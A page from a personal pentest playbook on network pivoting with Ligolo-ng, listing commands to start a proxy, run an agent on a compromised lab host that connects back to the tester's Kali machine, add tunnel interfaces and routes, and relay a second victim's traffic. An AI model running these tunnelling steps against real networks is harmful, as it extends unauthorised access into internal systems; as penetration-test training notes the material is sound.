๐ŸŽƒ
Jackmeister's Playbook
  • Welcome
  • Web Pentest
    • Mind Maps
    • Server Site Attacks
      • php type juggling
      • SSTI
      • SQL
        • PSG SQL
        • SQL Database Uses
        • SQL Injection
        • Blind SQL injection
        • SQLITE injection
      • psy shell
    • Recon
      • DNS Hunting
      • Web Tech Hunting
      • Credentials Harvesting
      • Subdomain Hunting
      • Javascript Hunting
    • Directory Brute Forcing
    • File Upload Tricks
      • PHP htaccess and ASP web.config bypass
      • PHP Exiftool edit and upload
      • PHP Extensions payloads / Cheatsheet
      • PHP disable_functions bypass
    • Client Site Attacks
      • Case Study - XSS-GPT
      • XSS
        • XSS All in one
        • XSS cookie stealing
        • Payloads / Cheatsheet
      • Javascript Crafting
      • PDF
    • CMS / Framework
      • apache / xampp
      • Django
      • Manegto
      • Joomla
      • Jenkins
      • Flask jinja2
      • tomcat
      • Drupal
      • nodejs
      • wordpress
    • Google Dorking
    • API
    • Command Injection
      • Command Injection Payloads/Cheatsheet
    • Rewrite URL
    • HTTP Request Smuggling (CL.TE)
  • Network Pentest
    • Linux
      • Internal Port Scanning
      • Privileges Escalation
      • Finding files
      • OVA2ROOT
    • Window
      • AV Evading
      • Chrome Password Extract
      • Internal Port Scanning
      • Privileges Escalation
      • ALL IN ONE
      • THM Priv Esc
      • Post Compromise
    • Port Forwarding
      • Playground Setup
    • Exploit Hunting
      • Searchsploit
    • tty-interactive-shell
    • Active Directory (AD)
      • Crackmapexec
  • Wireless Pentest
    • Airgeddon
    • Evil Twin
    • Aircrack
  • Vulnerability Assessment
    • Nmap
    • Nessus
  • General
    • Kiosk Escaping
    • Credential Bruteforcing
  • System Hardening
  • Phishing
    • Gophish
    • Mailing Server
    • SMS Server
    • DNS Server
Powered by GitBook
On this page
  • Ligolo
  • Starting listener server
  • Connecting from victim back to kali
  • Creating a new interface
  • Connecting to newly added connection
  • Connecting to victim local server port
  • Connecting to another multiple internal network

Was this helpful?

  1. Network Pentest

Port Forwarding

Ligolo

Starting listener server

./proxy -laddr 192.168.146.158:5555 -selfcert

Connecting from victim back to kali

./agent -connect 192.168.45.223:11601 -ignore-cert

Creating a new interface

sudo ip tuntap add user $(whoami) mode tun ligolo2 ; sudo ip link set ligolo2 up

# Adding routes
sudo ip r add 10.4.216.0/24 dev ligolo2

Connecting to newly added connection

ligolo-ng ยป session
? Specify a session : 1 - #1 - CRAFT2\apache@CRAFT2 - 192.168.230.188:49785
[Agent : CRAFT2\apache@CRAFT2] ยป ifconfig
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Interface 0                                   โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ Name         โ”‚ Ethernet0 2                    โ”‚
โ”‚ Hardware MAC โ”‚ 00:50:56:ab:d7:a7              โ”‚
โ”‚ MTU          โ”‚ 1500                           โ”‚
โ”‚ Flags        โ”‚ up|broadcast|multicast|running โ”‚
โ”‚ IPv4 Address โ”‚ 192.168.230.188/24             โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Interface 1                                  โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ Name         โ”‚ Loopback Pseudo-Interface 1   โ”‚
โ”‚ Hardware MAC โ”‚                               โ”‚
โ”‚ MTU          โ”‚ -1                            โ”‚
โ”‚ Flags        โ”‚ up|loopback|multicast|running โ”‚
โ”‚ IPv6 Address โ”‚ ::1/128                       โ”‚
โ”‚ IPv4 Address โ”‚ 127.0.0.1/8                   โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
[Agent : CRAFT2\apache@CRAFT2] ยป start --tun craft2-pv
[Agent : CRAFT2\apache@CRAFT2] ยป INFO[0307] Starting tunnel to CRAFT2\apache@CRAFT2

Connecting to victim local server port

sudo ip tuntap add user $(whoami) mode tun craft2-pv ; sudo ip link set craft2-pv up
sudo ip r add 240.0.0.1/32 dev craft2-pv

Connecting to another multiple internal network

[Agent : confluence@confluence01] ยป listener_add --addr 0.0.0.0:8888 --to 192.168.45.223:8080  --tcp

anything connects to port 8080 on victim will connect back to us on port 8888

  • first victim listen on port 8888

  • redirect all received traffic to kali server port 8080

  • second victim connect to first victim on port 8888

  • traffic will be redirected back to kali server

agent.exe -connect 192.168.26.131:8888 -ignore-cert
PreviousPost CompromiseNextPlayground Setup

Last updated 1 year ago

Was this helpful?

https://systemweakness.com/double-pivoting-for-newbies-with-ligolo-ng-4177b3f1f27b
https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683 https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding#chisel